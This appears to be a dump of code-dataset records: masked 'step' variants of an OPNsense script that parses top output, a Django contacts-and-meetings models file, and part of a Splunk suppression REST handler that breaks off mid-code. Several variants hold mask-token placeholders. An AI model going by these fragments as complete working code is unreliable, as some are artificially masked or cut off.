tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n if fieldname not in field_max_width or field_max_width[\n fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n print(ujson.dumps(result))\n else:\n for header_line in result['headers']:\n print(header_line)\n print('\\n')\n if fieldnames is not None:\n format_str = ''\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds' % (format_str, fieldname, \n field_max_width[fieldname] + 1)\n header_fields[fieldname] = fieldname\n print(format_str % header_fields)\n for detail_line in result['details']:\n print(format_str % detail_line)\n",
"step-3": "<mask token>\nimport collections\nimport tempfile\nimport subprocess\nimport os\nimport sys\nimport ujson\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat', '-ath'],\n capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],\n capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n', 2)[-1]\n for line in topData.split('\\n'):\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n if len(line.strip()) > 0:\n result['headers'].append(line)\n elif fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0:\n record[fieldname] = tidpid[tmp[0]] if tmp[0\n ] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n if fieldname not in field_max_width or field_max_width[\n fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n print(ujson.dumps(result))\n else:\n for header_line in result['headers']:\n print(header_line)\n print('\\n')\n if fieldnames is not None:\n format_str = ''\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds' % (format_str, fieldname, \n field_max_width[fieldname] + 1)\n header_fields[fieldname] = fieldname\n print(format_str % header_fields)\n for detail_line in result['details']:\n print(format_str % detail_line)\n",
"step-4": "#!/usr/local/bin/python3\n\n\"\"\"\n Copyright (c) 2015-2019 Ad Schellevis <ad@opnsense.org>\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n 1. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n 2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,\n INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\n AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\n --------------------------------------------------------------------------------------\n returns system activity (top)\n\"\"\"\nimport collections\nimport tempfile\nimport subprocess\nimport os\nimport sys\nimport ujson\n\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat','-ath'], capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n # grab second display so that CPU time data appears\n sp = subprocess.run(['/usr/bin/top','-aHSTn','-d2','999999'], capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n',2)[-1]\n for line in topData.split('\\n'):\n # end of header, start of top detection\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n # parse headers from top command, add to result\n if len(line.strip()) > 0:\n result['headers'].append(line)\n else:\n # parse details including fieldnames (leave original)\n if fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0: # PID\n record[fieldname] = tidpid[tmp[0]] if tmp[0] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n\n if fieldname not in field_max_width or field_max_width[fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n # output as json\n print(ujson.dumps(result))\n else:\n # output plain (reconstruct data)\n for header_line in result['headers']:\n print (header_line)\n print (\"\\n\")\n if fieldnames is not None:\n format_str = \"\"\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds'%(format_str,fieldname, field_max_width[fieldname]+1)\n header_fields[fieldname] = fieldname\n\n print (format_str % header_fields)\n for detail_line in result['details']:\n print (format_str % 
detail_line)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.db import models
class Location(models.Model):
id_location = models.AutoField(primary_key=True)
city = models.CharField(max_length=100, null=True)
street_name = models.CharField(max_length=100, null=True)
street_number = models.IntegerField(null=True)
zip = models.IntegerField(null=True)
country = models.CharField(max_length=100, null=True)
name = models.CharField(max_length=100, null=True)
latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)
longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)
def __str__(self):
# print('Name', type(self.name), '\nCountry', type(self.country), '\nCity', self.city)
return str(self.name) + ' - ' + str(self.country) + ': ' + str(self.city)
class Person(models.Model):
id_person = models.AutoField(primary_key=True)
nickname = models.CharField(max_length=100, null=True)
first_name = models.CharField(max_length=100, null=True)
last_name = models.CharField(max_length=100, null=True)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE, null=True, default=52)
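    # NOTE: 52 is a hard-coded Location primary key; it is assumed to exist in
    # the seed data, otherwise the default cannot resolve when a Person is saved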
birth_day = models.DateField(default='1900-01-01')
height = models.IntegerField(null=True)
GENDER = (
('Female', 'Female'),
('Male', 'Male'),
)
gender = models.CharField(max_length=20, choices=GENDER, null=True)
def __str__(self):
        return str(self.nickname) + ' ' + str(self.last_name) + ' ' + str(self.first_name)
class Contact_type(models.Model):
id_contact_type = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
validation_regexp = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Contact(models.Model):
id_contact = models.AutoField(primary_key=True)
id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.PROTECT, null=True)
contact = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id_person) + ' ' + str(self.contact)
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who1")
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who2")
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
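    # NOTE: DurationField expects a datetime.timedelta; default=0 is not one and
    # can fail validation, so datetime.timedelta(0) would be the safer default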
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + " - " + str(self.start_date) + " " + str(self.duration) + " " + str(
self.description) + " " + str(self.id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE, unique=False)
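# illustrative ORM usage of the models above (all values are made up):
#   loc = Location.objects.create(name='HQ', country='CZ', city='Prague')
#   kim = Person.objects.create(nickname='kim', first_name='Kim', last_name='Novak', id_location=loc)
#   Contact.objects.create(id_person=kim, contact='kim@example.com')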
|
normal
|
{
"blob_id": "914f477518918619e0e42184bd03c2a7ed16bb01",
"index": 86,
"step-1": "<mask token>\n\n\nclass Relation_type(models.Model):\n <mask token>\n <mask token>\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n",
"step-2": "<mask token>\n\n\nclass Person(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n",
"step-3": "<mask token>\n\n\nclass Location(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n",
"step-4": "<mask token>\n\n\nclass Location(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self\n .city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n",
"step-5": "from django.db import models\n\n\nclass Location(models.Model):\n id_location = models.AutoField(primary_key=True)\n city = models.CharField(max_length=100, null=True)\n street_name = models.CharField(max_length=100, null=True)\n street_number = models.IntegerField(null=True)\n zip = models.IntegerField(null=True)\n country = models.CharField(max_length=100, null=True)\n name = models.CharField(max_length=100, null=True)\n latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n\n def __str__(self):\n # print('Name', type(self.name), '\\nCountry', type(self.country), '\\nCity', self.city)\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self.city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE, null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = (\n ('Female', 'Female'),\n ('Male', 'Male'),\n )\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name=\"who1\")\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name=\"who2\")\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + \" - \" + str(self.start_date) + \" \" + str(self.duration) + \" \" + str(\n self.description) + \" \" + str(self.id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE, unique=False)\n",
"step-ids": [
9,
18,
20,
21,
24
]
}
|
[
9,
18,
20,
21,
24
] |
"""
Copyright (C) 2005 - 2016 Splunk Inc. All Rights Reserved.
"""
import logging
import sys
if sys.platform == "win32":
import os, msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
import splunk.admin as admin
import splunk.entity as entity
import splunk.util as util
from notable_event_suppression import NotableEventSuppression
from splunk import ResourceNotFound
from splunk.clilib.bundle_paths import make_splunkhome_path
sys.path.append(make_splunkhome_path(["etc", "apps", "SA-Utils", "lib"]))
from SolnCommon.log import setup_logger, SHORT_FORMAT
logger = setup_logger('suppressions_rest_handler', format=SHORT_FORMAT)
logger.setLevel(logging.INFO)
class InvalidConfigException(Exception):
pass
class InvalidParameterValueException(InvalidConfigException):
"""
Describes a config parameter that has an invalid value.
"""
def __init__(self, field, value, value_must_be):
message = "The value for the parameter '%s' is invalid: %s (was %s)" % (field, value_must_be, value)
        super(InvalidParameterValueException, self).__init__(message)
class UnsupportedParameterException(InvalidConfigException):
"""
Describes a config parameter that is unsupported.
"""
pass
class MissingTransitionException(InvalidConfigException):
"""
Describes a capability that is missing.
"""
def __init__(self, transitions):
self.transitions = transitions
        super(MissingTransitionException, self).__init__("Missing transition detected")
def _getFieldValue(args, name, default_value=None, max_length=None):
'''Get the field value from the argument list.'''
# Get the value if defined or the default value if not defined
    value = (args[name][0] or default_value) if name in args else default_value
# Check the length
if value and max_length and len(value) > max_length:
raise admin.ArgValidationException(
            'The %s cannot be longer than %s character%s.' % (name, max_length, "s" if max_length > 1 else ""))
return value
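# e.g. _getFieldValue({'search': ['index=notable']}, 'search') -> 'index=notable'
#      _getFieldValue({}, 'disabled', default_value='0')       -> '0'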
def _addToDictIfNonNull(d, name, value):
'''Add the given name and value to the dictionary if the value is not none.
Arguments:
d -- the dictionary to add to
name -- the name of the object to add
value -- the value of the object to add (if not none)
'''
if value is not None:
d[name] = value
class Suppressions(admin.MConfigHandler):
'''
Set up supported arguments
'''
# admin.py constants
REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4': 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32': 'ACTION_RELOAD'}
# Permissions
WRITE_CAPABILITY = 'edit_suppressions'
# Default Params
PARAM_DISABLED = 'disabled'
PARAM_SEARCH = 'search'
PARAM_DESCRIPTION = 'description'
VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]
REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]
# Configuration key mapping
CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}
# Default Vals
DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'
DEFAULT_OWNER = 'nobody'
DEFAULT_DISABLED = 0
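    # Each suppression is an ordinary eventtypes.conf stanza whose name matches
    # NotableEventSuppression.suppressionRE; illustrative stanza (the exact name
    # prefix is an assumption):
    #   [notable_suppression-noisy_scanner]
    #   search = `notable` | search src_ip="10.1.2.3"
    #   disabled = 0
    #   description = Suppress a known benign scanner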
def setup(self):
logger.info('Setting up suppressions_rest_handler')
# set write capability
self.setWriteCapability(Suppressions.WRITE_CAPABILITY)
if self.requestedAction == admin.ACTION_EDIT or self.requestedAction == admin.ACTION_CREATE:
# Fill required params
for arg in Suppressions.REQUIRED_PARAMS:
self.supportedArgs.addReqArg(arg)
# Fill valid params
for arg in Suppressions.VALID_PARAMS:
if arg not in Suppressions.REQUIRED_PARAMS:
self.supportedArgs.addOptArg(arg)
def handleCreate(self, confInfo):
'''Handles creation of a suppression.'''
# Get requested action
actionStr = str(self.requestedAction)
if actionStr in Suppressions.REQUESTED_ACTIONS:
actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]
logger.info('Entering %s', actionStr)
# Refresh
self.handleReload()
name = self.callerArgs.id
args = self.callerArgs.data
# Make sure the name is not empty
if not name or len(name) == 0:
raise admin.ArgValidationException("The name of the suppression must not be empty")
# Make sure the name follows the convention
nameMatch = NotableEventSuppression.suppressionRE.match(name)
if not nameMatch:
raise admin.ArgValidationException("The name of the suppression must follow proper convention")
# Make sure the item does not already exist
if name in self.readConf('eventtypes'):
raise admin.AlreadyExistsException("A suppression entry already exists for %s" % (name))
# Get the field values
disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)
search = _getFieldValue(args, Suppressions.PARAM_SEARCH)
description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)
# Add the field values to a configuration dictionary (that will be verified)
conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self.getSessionKey())
conf.namespace = self.appName # always save things to SOME app context.
conf.owner = self.context == admin.CONTEXT_APP_AND_USER and self.userName or "-"
conf['name'] = name
_addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)
_addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)
_addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)
## Notable Suppression Audit Log Data
log_data = {
'action': 'create',
'suppression': conf['name'][len(NotableEventSuppression.SUPPRESSION_START):],
'user': conf['eai:acl']['owner'],
'status': 'success',
'signature': 'Notable event suppression successfully created'
}
# Check the configuration
try:
Suppressions.checkConf(conf, name)
except InvalidConfigException as e:
e = "The configuration for the new suppression '%s' is invalid and could not be created: %s" % (name, str(e))
logger.error(e)
log_data['status'] = 'failure'
log_data['signature'] = 'Unable to save the event suppression'
logger.error('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))
raise admin.ArgValidationException(e)
# Write out an update to the eventtypes config file
entity.setEntity(conf, sessionKey=self.getSessionKey())
logger.info('Successfully added suppression: %s', name)
# Reload suppressions
self.handleReload()
logger.info('%s completed successfully', actionStr)
logger.info('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))
def handleCustom(self, confInfo):
logger.info('Handling custom action: %s', self.customAction)
if self.customAction == '_autodisable':
expired_count, enabled_count = NotableEventSuppression.disable_expired_suppressions(session_key=self.getSessionKey())
logger.info("%s expired suppressions detected; %s were enabled (now disabled)", expired_count, enabled_count)
else:
self.actionNotImplemented()
def handleList(self, confInfo):
"""
Handles listing of a suppression
"""
# Get requested action
actionStr = str(self.requestedAction)
if actionStr in Suppressions.REQUESTED_ACTIONS:
actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]
logger.info('Entering %s', actionStr)
self.handleReload()
# Get the configurations from suppression.conf
suppressionDict = self.readConfCtx('eventtypes')
# Get all suppressions and provide the relevant options
        if suppressionDict is not None:
# Check each conf
for stanza, settings in suppressionDict.items():
stanzaMatch = NotableEventSuppression.suppressionRE.match(stanza)
if stanzaMatch:
try:
# Check config
Suppressions.checkConf(settings, stanza, confInfo)
except InvalidConfigException as e:
logger.error("The configuration for suppression '%s' is invalid: %s", stanza, str(e))
logger.info('%s completed successfully', actionStr)
def handleReload(self, confInfo=None, makeCSV=True):
"""
Handles refresh/reload of the configuration options
"""
# Get requested action
actionStr = str(self.requestedAction)
if actionStr in Suppressions.REQUESTED_ACTIONS:
actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]
logger.info('Entering %s', actionStr)
logger.info('Refreshing suppression configurations via properties endpoint')
try:
refreshInfo = entity.refreshEntities('properties/eventtypes', sessionKey=self.getSessionKey())
except Exception as e:
logger.warn('Could not refresh suppression configurations via properties endpoint: %s', str(e))
logger.info('%s completed successfully', actionStr)
def handleEdit(self, confInfo):
"""
Handles edits to the configuration options
"""
# Get requested action
actionStr = str(self.requestedAction)
if actionStr in Suppressions.REQUESTED_ACTIONS:
actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]
logger.info('Entering %s', actionStr)
# Refresh
self.handleReload()
name = self.callerArgs.id
args = self.callerArgs
if name is not None:
# Make sure the name follows the convention
nameMatch = NotableEventSuppression.suppressionRE.match(name)
if not nameMatch:
raise admin.ArgValidationException("The name of the suppression must follow proper convention")
try:
conf = entity.getEntity('saved/eventtypes', name, sessionKey=self.getSessionKey())
except ResourceNotFound:
raise admin.NotFoundException("A suppression configuration with the given name '%s' could not be found" % (name))
else:
# Stop if no name was provided
raise admin.ArgValidationException("No name provided")
## Notable Suppression Audit Log Data
log_data = {
'status': 'success',
'action': 'edit',
'signature': 'Notable event suppression successfully saved',
'suppression': name[len(NotableEventSuppression.SUPPRESSION_START):],
'user': conf['eai:userName']
}
# Create the resulting configuration that would be persisted if the settings provided are applied
for key, val in conf.items():
if key in args.data:
# Set the value to a single space so that the field is set to a blank value
new_value = args[key][0]
if new_value in [None, '']:
new_value = ' '
## If a value other than the 'disabled' param is changed, it
# came from the editor, otherwise the lister.
if key == self.PARAM_DISABLED:
conf_key = util.normalizeBoolean(conf[key], enableStrictMode=True)
new_value = util.normalizeBoolean(new_value, enableStrictMode=True)
if conf_key != new_value:
log_data['action'] = 'disable' if new_value else 'enable'
log_data['signature'] = 'Suppression successfully disabled' if new_value else 'Suppression successfully enabled'
conf[key] = new_value
if key == admin.EAI_ENTRY_ACL:
                for k, v in self.CONF_KEY_MAPPING.items():
if k in val and val[k] is not None and len(val[k]) > 0:
setattr(conf, v, val[k])
if conf.namespace is None or len(conf.namespace) == 0:
conf.namespace = Suppressions.DEFAULT_NAMESPACE
if conf.owner is None or len(conf.owner) == 0:
conf.owner = Suppressions.DEFAULT_OWNER
try:
# Check config
Suppressions.checkConf(conf, name)
except InvalidConfigException as e:
e = "The edit attempt for the suppression '%s' produced an invalid configuration: %s" % (name, str(e))
logger.error(e)
log_data['status'] = 'failure'
if log_data['action'] == 'edit':
log_data['signature'] = 'Unable to save the event suppression'
elif log_data['action'] == 'enable':
